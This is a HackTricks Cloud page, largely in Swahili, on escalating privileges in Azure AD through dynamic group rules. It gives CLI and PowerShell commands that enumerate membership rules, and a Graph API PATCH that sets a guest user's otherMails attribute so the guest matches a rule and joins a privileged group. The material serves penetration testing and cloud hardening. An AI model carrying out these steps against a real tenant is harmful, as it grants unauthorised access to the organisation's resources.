HackTricks CloudAz - Dynamic Groups Privesc
Tip
Jifunze na fanya mazoezi ya AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.
Taarifa za Msingi
Dynamic groups ni vikundi vinavyokuwa na seti ya rules zilizosanidiwa na wote users or devices vinavyokidhi rules hizi huongezwa kwenye kundi. Kila wakati sifa za mtumiaji au kifaa (attribute) zinapobadilika, rules za dynamic huangaliwa tena. Na wakati new rule inapotengenezwa, vifaa na watumiaji wote huangaliwa.
Dynamic groups zinaweza kuwa na Azure RBAC roles assigned kwao, lakini haiwezekani kuongeza AzureAD roles kwenye dynamic groups.
Kipengele hiki kinahitaji Azure AD premium P1 license.
Privesc
Kumbuka kuwa kwa chaguo-msingi mtumiaji yeyote anaweza kualika guests katika Azure AD, hivyo, ikiwa rule ya dynamic group inawapa watumiaji permissions kulingana na attributes ambazo zinaweza kuwekewa guest mpya, inawezekana kuunda guest mwenye attributes hizi na escalate privileges. Pia guest anaweza kusimamia wasifu wake mwenyewe na kubadilisha attributes hizi.
Pata vikundi vinavyoruhusu Dynamic membership: az ad group list --query "[?contains(groupTypes, 'DynamicMembership')]" --output table
Dynamic Groups Enumeration
Pata rules za dynamic group:
Kwa Azure CLI:
az ad group list \
--filter "groupTypes/any(c:c eq 'DynamicMembership')" \
--query "[].{displayName:displayName, rule:membershipRule}" \
-o table
Kwa PowerShell na Microsoft Graph SDK:
Install-Module Microsoft.Graph -Scope CurrentUser -Force
Import-Module Microsoft.Graph
Connect-MgGraph -Scopes "Group.Read.All"
Get-MgGroup -Filter "groupTypes/any(c:c eq 'DynamicMembership')" `
-Property Id, DisplayName, GroupTypes
# Get the rules of a specific group
$g = Get-MgGroup -Filter "displayName eq '<GROUP NAME>'" `
-Property DisplayName, GroupTypes, MembershipRule, MembershipRuleProcessingState
$g | Select-Object DisplayName, GroupTypes, MembershipRule
# Get the rules of all dynamic groups
Get-MgGroup -Filter "groupTypes/any(c:c eq 'DynamicMembership')" `
-Property DisplayName, MembershipRule |
Select-Object DisplayName, MembershipRule
Mfano
- Mfano wa kanuni:
(user.otherMails -any (_ -contains "security")) -and (user.userType -eq "guest") - Maelezo ya kanuni: Mtumiaji yeyote wa Guest ambaye ana barua-pepe ya pili inayojumuisha ‘security’ ataongezwa kwenye kundi
Kwa barua-pepe ya mtumiaji Guest, kubali mualiko na angalia mipangilio ya sasa ya mtumiaji huyo katika https://entra.microsoft.com/#view/Microsoft_AAD_IAM/TenantOverview.ReactView.
Kwa bahati mbaya ukurasa haukuruhusu kubadilisha thamani za sifa, hivyo tunahitaji kutumia API:
# Login with the gust user
az login --allow-no-subscriptions
# Get user object ID
az ad signed-in-user show
# Update otherMails
az rest --method PATCH \
--url "https://graph.microsoft.com/v1.0/users/<user-object-id>" \
--headers 'Content-Type=application/json' \
--body '{"otherMails": ["newemail@example.com", "anotheremail@example.com"]}'
# Verify the update
az rest --method GET \
--url "https://graph.microsoft.com/v1.0/users/<user-object-id>" \
--query "otherMails"
Marejeo
Tip
Jifunze na fanya mazoezi ya AWS Hacking:
Jifunze na fanya mazoezi ya GCP Hacking:Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.